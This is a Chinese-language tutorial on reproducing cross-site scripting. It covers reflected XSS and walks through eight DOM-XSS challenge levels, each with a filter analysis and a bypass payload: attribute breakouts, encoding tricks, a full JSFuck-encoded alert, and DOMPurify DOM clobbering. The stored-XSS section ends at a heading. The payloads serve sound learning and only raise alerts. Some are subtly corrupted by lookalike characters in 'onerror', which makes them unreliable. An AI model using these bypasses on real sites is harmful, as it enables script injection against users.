XSS复现

news2024/12/25 12:35:39

目录

XSS简单介绍

一、反射型

        1、漏洞逻辑:

为什么有些标签可以触发,有些标签不能触发

可以触发的标签

不能触发的标签

为什么某些标签能触发而某些不能

二、DOM型

1、Ma Spaghet!

要求:

分析:

结果:

2、Jefff

要求:

分析:

结果:

3、Ugandan Knuckles

要求:

分析:

结果:

4、Ricardo Milos

要求:

分析:

结果:

5、Ah That's Hawt

要求:

分析:

结果:

6、Ligma

要求:

分析:

结果:

7、Mafia

要求:

分析:

结果:

8、Ok, Boomer

要求:

分析:

结果:

三、存储型

漏洞原理:

复现:

low等级:

Medium等级:

high等级:


XSS简单介绍

         XSS是一种网络安全漏洞,允许攻击者通过注入恶意脚本到网页中,影响用户。主要类型包括反射型XSS、DOM型XSS和CSS型XSS。防范措施包括输入验证、转义用户输入和使用HttpOnlyCookie。文章详细解释了各种XSS攻击的原理和防范方法。

一、反射型

        1、漏洞逻辑:

                前端可以解析js的,而反射型的漏洞语句也是js,用户输入js代码,没有很好的过滤就将

                js代码放到前端进行解析形成漏洞。

注意并不是所有的标签都可以,随意写XSS不解析反而可能会暴露

常用的js方法:

        alert()

        confirm()

        prompt()

js都继承了一个祖先(window)所以容易出问题

为什么有些标签可以触发,有些标签不能触发

可以触发的标签

在反射型XSS中,多种HTML标签在特定条件下都能被用来触发攻击。这些标签通常包含事件处理器属性,如onerroronmouseoveronclick等,这些属性可以执行JavaScript代码。以下是一些常见的可以触发XSS攻击的标签及其示例:

  1. <img>:通过onerror事件处理器,当图片加载失败时会执行其中的JavaScript代码。例如:<img src="x" onerror="alert('XSS')">

  2. <script>:最直接的方式,用于直接插入并执行JavaScript代码。然而,在许多情况下,<script>标签会被过滤,因此攻击者需要寻找绕过这些过滤的方法。

  3. <a>:通过href属性使用伪协议(如javascript:)或结合onclick事件处理器来触发XSS。例如:<a href="javascript:alert('XSS')">Click me</a>

  4. <input><button>等表单元素:这些元素可以通过onclickonsubmit等事件处理器来触发XSS。

不能触发的标签

并非所有HTML标签都能直接用于触发XSS攻击。一些标签由于不包含可执行的JavaScript代码或事件处理器属性,因此不能直接用于此目的。然而,需要注意的是,即使某些标签本身不能直接触发XSS,它们也可能被用于构建更复杂的攻击场景,例如通过修改DOM结构来间接影响可触发XSS的标签。

一般来说,以下类型的标签不太可能直接触发XSS攻击:

纯展示性标签:如<p><h1>等,这些标签仅用于展示文本内容,不包含任何可执行代码或事件处理器。

无事件处理器的标签:如果标签本身不包含或不允许添加事件处理器属性(如onclickonerror等),则它们不能直接用于触发XSS。

为什么某些标签能触发而某些不能

  1. 事件处理器属性:能够触发XSS的标签通常包含事件处理器属性,这些属性允许在特定事件发生时执行JavaScript代码。

  2. 过滤机制:许多Web应用程序会实现输入过滤机制,以阻止或限制<script>等危险标签的插入。因此,即使某些标签在理论上可以触发XSS,但在实际应用中可能会受到过滤机制的限制。

  3. 浏览器安全策略:现代浏览器实现了多种安全策略来防止XSS攻击,包括内容安全策略(CSP)、同源策略等。这些策略可以限制或禁止某些类型的脚本执行或资源加载。

二、DOM型

        使用在线的dom型xss平台

1、Ma Spaghet!

要求:

        弹出1337,不能和用户交互(不可以用类似标签点击)

分析:

传递的所有参数直接放进了h2标签里

<script>alert(1)</script>

而这标签官方认为危险被禁用所以尝试用img标签,innerHTML 只能过滤<script></script>

?somebody=<img%20src=1%20οnerrοr="alert(1337)">

结果:

2、Jefff

要求:

        弹出1337,不能和用户交互(不可以用类似标签点击)

分析:

        我们可以看到给h2传参使用的是innerText,所以我们想在maname.innerText = ma上面做基

        本不可能了。我们只能考虑在eval中做

尝试1:闭合双引号,之后在其中闭合双引号。

        原理是:eval(`ma = "Ma name aaa" ;alert(12);""`)

        尝试输入:?jeff=aaa";alert(1337);"

尝试2:可以使用连接符的方式来做:

        尝试输入:?jeff=asd" ;-alert(12)-"

结果:

3、Ugandan Knuckles

要求:

        弹出1337,不能和用户交互(不可以用类似标签点击)

分析:

        wey = wey.replace(/[<>]/g, '') ----- 过滤了 < 和 > ;

尝试:闭合双引号。

               wey=aaa" οnclick="alert(1337)        但是会与用户交互

        onfocus不可以自动聚焦,所以我们还需要一个函数autofocus来自动聚焦,这样就不需要用户

        的参与就可以触发了。

尝试输入:?wey=aaa"οnfοcus="alert(1337)"autofocus="true

结果:

4、Ricardo Milos

要求:

        弹出1337,不能和用户交互(不可以用类似标签点击)

分析:

        这段代码的意思为在2秒后对from表单进行提交,提交的位置就是ricardo.action 接收到的路

        径,路径由get参数中的ricardo提供。在action中可以识别js伪协议

尝试:?ricardo=javascript:alert(1337)

结果:

5、Ah That's Hawt

要求:

        弹出1337,不能和用户交互(不可以用类似标签点击)

分析:

        

        smith = smith.replace(/[\(\`\)\\]/g, '')         过滤了括号,反引号,转义字符。

        smith.replace进行了过滤,但是我们可以使用编码的方式来绕过它的过滤

尝试:markassbrownlee=<img src=1 οnerrοr="alert(1)">

        传递的参数在url中,所以如果我们直接将(1336)进行urlcode编码浏览器传递给smith时会

        自动解码,但是在url中要遵守url规则,不能直接传递实体编码

实体编码:

        markassbrownlee=<img src=1 οnerrοr="alert&#40;1336&#41;">

urlcode编码:

        markassbrownlee=<img src=1 οnerrοr="alert%26%2340%3B1336%26%2341%3B">

结果:

6、Ligma

要求:

        弹出1337,不能和用户交互(不可以用类似标签点击)

分析:

        过滤了字母和数字,然后直接eval,这得用JSFuck绕过,可以将正常的js代码混淆为

        只包含[, ], (, ), !, +这6种字符的字符串

输入 alert(1337)
JSFuck加密:

[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])(!+[]+!![]+!![]+!![]+!![]+!![]))[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])(!+[]+!![])([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])(!+[]+!![]+!![]+!![]+!![]+!![]))[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])(!+[]+!![]+!![]+!![]+!![]+!![]+!![])(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[]))+(+!![]+[])+(!+[]+!![]+!![]+[])+(!+[]+!![]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+[])+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[+[]]+([][[]]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])(!+[]+!![]+!![]+!![]+!![]+!![]))[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])(!+[]+!![])([][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(![]+[])[!+[]+!![]+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+([]+[][(![]+[])[!+[]+!![]+!![]]+([]+{})[+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]][([]+{})[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]]+(![]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+[]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(!![]+[])[+[]]+([]+{})[+!![]]+(!![]+[])[+!![]]]((!![]+[])[+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!![]]+([][[]]+[])[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]+!![]+!![]]+(![]+[])[!+[]+!![]]+([]+{})[+!![]]+([]+{})[!+[]+!![]+!![]+!![]+!![]]+(+{}+[])[+!![]]+(!![]+[])[+[]]+([][[]]+[])[!+[]+!![]+!![]+!![]+!![]]+([]+{})[+!![]]+([][[]]+[])[+!![]])(!+[]+!![]+!![]+!![]+!![]+!![]))[!+[]+!![]+!![]]+([][[]]+[])[!+[]+!![]+!![]])(!+[]+!![]+!![]+!![]+!![]+!![]+!![])(([]+{})[+[]])[+[]]+(!+[]+!![]+[])+(!+[]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+!![]+[])))(!+[]+!![])

url编码:

%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D((!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%5B%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D)()

尝试输入:

?balls=%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%5B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(%5B%5D%5B%5B%5D%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D((!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B%5B%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D%5B(!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(%5B!%5B%5D%5D%2B%5B%5D%5B%5B%5D%5D)%5B%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D%2B(!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B!%2B%5B%5D%5D%2B(!!%5B%5D%2B%5B%5D)%5B%2B!%2B%5B%5D%5D%5D)%5B!%2B%5B%5D%2B!%2B%5B%5D%2B%5B%2B%5B%5D%5D%5D)()

结果:

7、Mafia

要求:

        弹出1337,不能和用户交互(不可以用类似标签点击)

分析:

        过滤了: 截取长度50的字符串
                        ' " + - ! \ [ ] 被替换为_
                        alert被替换为_

定义匿名函数,利用匿名函数的参数构造payload同时使用正则表达式来绕过alert字符串的检测。

?mafia=Function(/ALERT(1337)/.source.toLowerCase())()

或者利用数字和字符串之间的互相转换,来绕过针对alert的检测。

?mafia=eval(8680439..toString(30))(1337)

结果:

8、Ok, Boomer

要求:

        弹出1337,不能和用户交互(不可以用类似标签点击)

分析:

使用了DOMPurify这个第三方库来过滤非法字符

setTimeout(ok, 2000)中的ok可以接收一个函数或者字符串,如果我们能够向ok这个变量注入可执行的payload,那么也就能成功弹框

可以使用DOM Clobbering的方式,通过向HTML注入DOM元素,来实现操作JavaScript变量

先构造一个变量ok,通过创建一个id=ok的DOM元素来实现ok需要接受一个字符串作为值,而在对标签调用toString()方法时,会返回属性href的值,可以选择标签作为构造对象

通过查看DOMPurify的源码可以发现,它支持的合法的协议有mailto, tel, xmpp等等

尝试输入:

        ?boomer=<a%20id=ok%20href=mailto:alert(1337)>

结果:

三、存储型

漏洞原理:

存储型XSS又称持久型XSS,攻击脚本被永久地存放在目标服务器的数据库或文件中,具有很高的隐蔽性。 存储型XSS与反射型XSS不同的是,存储型XSS是攻击者将恶意的payload通过留言板、博客系统发送至后台服务器存储起来,当其他用户访问这个页面时就会受到攻击,不需要用户手动点击payload便可完成攻击。

复现:

low等级:

